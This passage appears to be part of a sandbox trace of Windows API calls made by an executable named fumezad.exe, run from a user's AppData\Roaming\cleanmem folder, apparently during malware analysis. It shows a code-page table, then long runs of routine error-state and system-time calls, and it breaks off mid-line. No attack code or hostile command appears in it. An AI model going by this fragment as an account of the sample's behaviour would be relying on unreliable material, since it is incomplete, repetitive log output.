c3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa2\x47\xcb\x9d\xf4\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0110.508] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4768e0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.508] SetLastError (dwErrCode=0x0) [0110.508] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.509] SetLastError (dwErrCode=0x0) [0110.509] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.510] GetLastError () returned 0x0 [0110.510] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.511] GetLastError () returned 0x0 [0110.511] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.512] GetLastError () returned 0x0 [0110.512] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.513] SetLastError (dwErrCode=0x0) [0110.513] GetLastError () returned 0x0 [0110.514] SetLastError (dwErrCode=0x0) [0110.514] GetLastError () returned 0x0 [0110.514] SetLastError (dwErrCode=0x0) [0110.514] GetLastError () returned 0x0 [0110.514] SetLastError (dwErrCode=0x0) [0110.514] GetLastError () returned 0x0 [0110.514] SetLastError (dwErrCode=0x0) [0110.515] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0110.515] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40c6ab) returned 0x0 [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.515] GetLastError () returned 0x0 [0110.515] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.516] SetLastError (dwErrCode=0x0) [0110.516] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.517] GetLastError () returned 0x0 [0110.517] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.518] GetLastError () returned 0x0 [0110.518] SetLastError (dwErrCode=0x0) [0110.518] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.519] SetLastError (dwErrCode=0x0) [0110.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.519] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53b14b0, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.520] SetLastError (dwErrCode=0x0) [0110.520] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.520] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.521] GetLastError () returned 0x0 [0110.521] SetLastError (dwErrCode=0x0) [0110.521] GetSystemTimeAsFileTime (in: 